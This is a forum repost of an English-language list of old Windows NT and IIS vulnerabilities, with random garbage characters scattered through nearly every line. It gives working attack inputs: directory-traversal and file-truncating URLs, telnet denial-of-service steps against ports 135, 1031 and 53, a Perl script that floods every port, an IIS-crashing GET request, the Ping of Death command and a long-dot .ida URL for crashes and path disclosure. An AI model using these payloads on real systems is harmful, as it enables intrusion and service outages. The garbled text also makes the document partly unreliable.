標題: NT的漏洞及描述(英文) [打印本頁] 作者: 雜七雜八 時間: 2011-1-13 17:12 標題: NT的漏洞及描述(英文) 受影響系統(tǒng):4.0,iis 1.0" _3 x( g( m: ~2 Q* Z1 ~/ s
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.2 ]2 E. z9 V/ E4 G: o9 {% c
, f* T/ t2 i" ~9 E) pA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script. / A, P3 C: m0 h& U. k S1 b/ c& V ' h L$ b7 N4 C! ^By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.7 m1 W- ~, F4 M6 l9 z
& Q( D2 z3 o2 Q O5 s
-------------------------------------------------------------------- M+ Y1 P$ ]' u$ I0 R$ H# A. b/ }8 K
受影響系統(tǒng):4.0) f9 a5 Q' {+ g
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.1 d6 g6 Z3 d+ {" z7 ?1 k
9 v, n6 W5 R/ W; h( f' nIf the file 'target.bat' exists, the file will be truncated. % n# r7 T) w( Y/ h7 j 6 K u( c6 ^5 m- L# C5 n& L8 o- I& z4 ]4 A! }! H3 p2 F* @
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''. B- e- [6 \' K1 Z( p B, }% c- O
8 W- H; [0 W/ ]: n9 J
---------------------------------------------------------------------- 8 k; Y7 I2 |* ?: g. G0 l; }, l" E! X0 J- h1 i% m3 N
受影響系統(tǒng):3.51,4.0 " Y3 A0 l. k# S8 f8 ZMultiple service ports (53, 135, 1031) are vunerable to 'confusion'. ( U: O9 ?# k; m- z" F( I# v d9 |. X' F& O. f- W
The following steps; 2 g: p$ o/ U7 k: }/ d9 ?) I) E( S$ r' [! R$ l- V
Telnet to an NT 4.0 system on port 135 : v) p l9 B) r- yType about 10 characters followed by a <CR> ! ^( w0 U. U8 `6 P! G$ [Exit Telnet - O- ^* ^' P, Y7 H+ n. presults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system. p8 L( r8 ?8 n( W, G1 @4 J. [$ Q8 P6 K; a; V" V' I! B
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.1 \, c5 x* _0 ^0 Y$ c" ~
+ K1 c0 N" D; m1 v n# o( @
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted./ l, |+ x# i" l
: R$ @( P) @ X# h1 fIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning. - [' }9 y- ?; m: X4 _! E. l% J- x0 [- {. V7 k/ x' _( F* Z5 V* C. d
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):7 N0 P- P( k; @" V0 m8 N
' g5 S5 I6 k& s$ e) B6 d3 R3 g/*begin poke code*/ , B1 _# h& c- I6 V; u5 U* z- g. N9 q
use Socket;1 [! l4 v2 t2 O e' w& m* e- @
use FileHandle; 2 V k0 l |8 }4 |2 f+ [require "chat2.pl"; , i: P2 O$ a2 z; @$ M4 E& y6 K8 g3 v& U
$systemname = $ARGV[0] && shift; l& S" M; A, J# P$ k0 l8 B! T* D( w; f, Q
$verbose = 1; # tell me what you're hitting - q2 k$ d0 {& Q, t2 d3 s- z$knownports = 1; # don't hit known problem ports3 i; l0 ?; Z [/ _/ o( Z+ a
for ($port = $0; $port<65535; $port++) ( Q; P( i" L$ `{9 H, Y7 n$ ~5 w9 O5 ]% Y# U
- {, d& L3 m' g1 J( I
4 |' R, _; h. R9 B3 }
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) { % K1 Q) s3 L [% e# B& P( w( `next; # ?4 u6 s: i2 E7 m, e}6 S% f9 t+ v+ s$ e+ k
$fh = chat::open_port($systemname, $port); / P+ v6 Q0 B# N; v2 j1 `chat::print ($fh,"This is about ten characters or more");3 n( t( M) j' H) \: [" ]1 ^
if ($verbose) {4 b4 b) L8 j1 m
print "Trying port: $port\n"; 6 j* n3 N+ N# D7 j% T8 }} ' a' f9 B$ N t' z! M) U0 j+ kchat::close($fh);9 h4 _& T K0 G" }/ x
" n. g9 Y: X8 z. L8 E}. Z ]1 e" ~6 W" g' j, j4 w1 g4 n/ H
# _! q- W# I1 `6 T6 `' t* A
# j. A+ e/ O$ j% r9 W! W0 h* b2 z/*end poke code*/# f6 _4 z P- i' w1 y
' U4 K0 O+ g) Z$ [7 X3 dSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername% [6 P, g5 K* A; A& d8 T
7 v r4 |4 k) Q5 p3 D4 j
-------------------------------------------------------------------------------- 9 S& P1 `1 m& e+ q! @; H- y* \: m8 Z" e3 U/ @, L0 b8 t$ }( K
受影響系統(tǒng):4.0( [( `+ m9 Y5 U" U: S) Q
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS. 5 ~7 o9 P8 p' \. |1 V; J 1 y0 |2 u* ? m$ k4 UThis attack causes Dr. Watson to display an alert window and to log an error: 5 b5 d3 P$ d' E" Y& k. I $ g6 K, l1 E: b& v"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT" $ l, F: _' |( T0 |3 g; Y- s* j( A! p1 W1 Y& x" D
--------------------------------------------------------------------------------# a( j* e8 l, [
5 W M9 X) ~ N. E) P* @2 x4 j" \受影響系統(tǒng):3.51,4.0( C; c3 W# q& R' V0 f* l- R
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems: # }8 v; ]2 v6 l, m# J2 q: A* X( x g+ L+ r; M8 x% B
STOP: 0X0000001E # M3 i2 S1 ^9 `, e( tKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS 2 A' S. m1 W" j, n* \$ Q9 w5 j9 |: v3 A7 ]( o
-OR- 3 a: n# c; g! [* O) V, w& |! M( x" S. D% o
STOP: 0x0000000A " y# {- O& w7 y" a V- k) YIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS) u" L, q% z3 H) h3 z2 M/ y! F& D
3 } F* |1 b" c, L3 E8 PNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.: b5 \3 J) N ?* G7 h7 \4 H
& j# O; N2 Q9 |* G4 e" Z; \-------------------------------------------------------------------------------- / c: g# L+ R1 M5 C5 R* v . w5 B2 C7 p: T0 Z1 PMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). 3 S5 m6 V5 ]( |) N1 _' a
# t6 G8 a. i( Z3 c8 H# \4 F
--------------------------------------------------------/ k: r5 v6 [/ x1 k" [
- m8 t" w- q8 _7 c+ U6 ?$ K* V
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server